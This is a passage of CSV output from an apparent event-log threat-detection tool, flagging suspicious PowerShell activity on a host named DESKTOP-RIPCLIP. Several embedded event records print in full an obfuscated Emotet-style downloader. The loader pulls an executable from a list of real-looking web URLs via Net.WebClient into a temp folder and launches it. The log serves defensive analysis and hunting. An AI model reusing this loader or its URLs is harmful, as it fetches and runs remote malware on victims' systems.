uot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Object): &quot;New-Object&quot;
ParameterBinding(New-Object): name=&quot;TypeName&quot;; value=&quot;neT.WEbcLiENt&quot;
</Data>
<Binary></Binary>
</EventData>
</Event>",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Invoke-Item): &quot;Invoke-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""PowerShell"">
</Provider>
<EventID Qualifiers=""0"">800</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:33.505877Z"">
</TimeCreated>
<EventRecordID>792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""0"" ThreadID=""0"">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security>
</Security>
</System>
<EventData>
<Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;), DetailSequence=1
DetailTotal=1
SequenceNumber=33
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Invoke-Item): &quot;Invoke-Item&quot;
ParameterBinding(Invoke-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe&quot;
</Data>
<Binary></Binary>
</EventData>
</Event>",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Item): &quot;New-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""PowerShell"">
</Provider>
<EventID Qualifiers=""0"">800</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:29.083919Z"">
</TimeCreated>
<EventRecordID>786</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""0"" ThreadID=""0"">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security>
</Security>
</System>
<EventData>
<Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If 